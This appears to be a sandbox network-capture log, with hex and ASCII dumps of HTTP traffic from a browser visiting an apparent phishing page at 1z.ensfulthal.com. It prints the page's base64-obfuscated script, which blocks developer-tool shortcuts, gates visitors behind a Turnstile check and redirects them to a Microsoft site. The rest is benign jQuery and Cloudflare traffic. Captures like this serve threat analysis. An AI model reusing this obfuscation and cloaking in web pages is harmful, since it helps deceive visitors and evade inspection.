                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 34 63 30 34 0d 0a 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47 78 6c 62 6d 64 6c 63 79 35 6a 62 47 39 31 5a 47 5a 73 59 58 4a 6c 4c 6d 4e 76 62 53 39 30 64 58 4a 75 63 33 52 70 62 47 55 76 64 6a 41 76 59 58 42 70 4c 6d 70 7a 50 33 4a 6c 62 6d 52 6c 63 6a 31 6c 65 48 42 73 61 57 4e 70 64 43 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d
                                                                                          Data Ascii: 4c04GVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcm
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 64 47 38 37 66 51 30 4b 49 33 5a 56 62 55 35 52 55 56 4e 71 51 6d 55 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 6b 42 74 5a 57 52 70 59 53 41 6f 62 57 6c 75 4c 58 64 70 5a 48 52 6f 4f 6a 6b 35 4d 6e 42 34 4b 58 73 4e 43 69 4e 32 56 57 31 4f 55 56 46 54 61 6b 4a 6c 49 43 35 6a 62 32 77 74 62 47 63 74 4e 48 74 6d 62 47 56 34 4f 6a 41 67 4d 43 42 68 64 58 52 76 4f 33 64 70 5a 48 52 6f 4f 6a 4d 7a 4c 6a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4a 54 74 39 44 51 70 39 44 51 6f 6a 64 6c 56 74 54 6c 46 52 55 32 70 43 5a 53 41 75 5a 47 6c 7a 63 47 78 68 65 53 30 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 75 4d 6a 56
                                                                                          Data Ascii: dG87fQ0KI3ZVbU5RUVNqQmUgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiN2VW1OUVFTakJlIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojdlVtTlFRU2pCZSAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjV
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 6a 63 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 63 30 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72
                                                                                          Data Ascii: iAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5r
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 51 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4c 43 41 78 4d 44 41 77 4b 54 73 4e 43 6e 30 70 4b 43 6b 37 44 51 6f 67 49 43 41 67 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 38 4c 32 68 6c 59 57 51 2b 44 51 6f 4e 43 6a 78 69 62 32 52 35 49 48 4e 30 65 57 78 6c 50 53 4a 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61
                                                                                          Data Ascii: QuY29tJyk7DQogICAgICAgIH0NCiAgICB9LCAxMDAwKTsNCn0pKCk7DQogICAgPC9zY3JpcHQ+DQo8L2hlYWQ+DQoNCjxib2R5IHN0eWxlPSJmb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJla
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 4b 49 43 41 67 49 48 4e 70 64 47 56 72 5a 58 6b 36 49 43 63 77 65 44 52 42 51 55 46 42 51 55 46 42 65 6a 51 32 55 47 6c 76 56 47 64 6d 58 30 35 56 63 45 49 6e 4c 41 30 4b 49 43 41 67 49 43 64 6c 63 6e 4a 76 63 69 31 6a 59 57 78 73 59 6d 46 6a 61 79 63 36 49 48 5a 70 57 6b 56 78 59 55 6c 43 64 6b 55 73 44 51 6f 67 49 43 41 67 59 32 46 73 62 47 4a 68 59 32 73 36 49 46 52 51 63 55 74 50 55 47 4e 70 61 47 59 73 44 51 70 39 4b 54 73 4e 43 6d 5a 31 62 6d 4e 30 61 57 39 75 49 48 5a 70 57 6b 56 78 59 55 6c 43 64 6b 55 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e 4a 6c 63 32 56 30 4b 43 6b 37 44 51 70 39 44 51 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 55 55 48 46 4c 54 31 42 6a 61 57 68 6d 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 48
                                                                                          Data Ascii: KICAgIHNpdGVrZXk6ICcweDRBQUFBQUFBejQ2UGlvVGdmX05VcEInLA0KICAgICdlcnJvci1jYWxsYmFjayc6IHZpWkVxYUlCdkUsDQogICAgY2FsbGJhY2s6IFRQcUtPUGNpaGYsDQp9KTsNCmZ1bmN0aW9uIHZpWkVxYUlCdkUoKSB7DQogICAgdHVybnN0aWxlLnJlc2V0KCk7DQp9DQpmdW5jdGlvbiBUUHFLT1BjaWhmKCkgew0KICAgIH
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 6c 63 6e 4a 76 63 69 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 6c 65 47 4e 6f 59 57 35 6e 5a 53 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4b 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 61 57 59 6f 64 47 56 34 64 43 41 68 50 53 41 77 4b 58 73 4e 43 69 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 6c 65 47 4e 6f 59 57 35
                                                                                          Data Ascii: IGlmKGRhdGFbJ3N0YXR1cyddID09ICdlcnJvcicpew0KICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9leGNoYW5nZS5taWNyb3NvZnQuY29tJyk7DQogICAgICAgIH0NCiAgICB9KTsNCiAgICB9DQogICAgaWYodGV4dCAhPSAwKXsNCiAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9leGNoYW5
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 4f 7a 61 43 63 71 47 6d 57 20 3d 3d 20 63 74 75 50 55 4b 45 4a 54 65 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64
                                                                                          Data Ascii: OzaCcqGmW == ctuPUKEJTe){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0d
                                                                                          2024-11-27 14:15:04 UTC1369INData Raw: 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 33 5a 56 62 55 35 52 55 56 4e 71 51 6d 55 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 6b 42 74 5a 57 52 70 59 53 41 6f 62 57 6c 75 4c 58 64 70 5a 48 52 6f 4f 6a 6b 35 4d 6e 42 34 4b 58 73 4e 43 69 4e 32 56 57 31 4f 55 56 46 54 61 6b 4a 6c 49 43
                                                                                          Data Ascii: yLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI3ZVbU5RUVNqQmUgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiN2VW1OUVFTakJlIC


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.1649726104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:06 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: script
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:06 UTC386INHTTP/1.1 302 Found
                                                                                          Date: Wed, 27 Nov 2024 14:15:06 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          location: /turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92ba7b594a421b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.1649724151.101.66.1374435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:06 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                          Host: code.jquery.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: script
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:06 UTC613INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          Content-Length: 89501
                                                                                          Server: nginx
                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                          ETag: "28feccc0-15d9d"
                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                          Accept-Ranges: bytes
                                                                                          Age: 1238438
                                                                                          Date: Wed, 27 Nov 2024 14:15:06 GMT
                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740036-EWR
                                                                                          X-Cache: HIT, HIT
                                                                                          X-Cache-Hits: 2774, 0
                                                                                          X-Timer: S1732716907.778375,VS0,VE1
                                                                                          Vary: Accept-Encoding
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                          2024-11-27 14:15:06 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
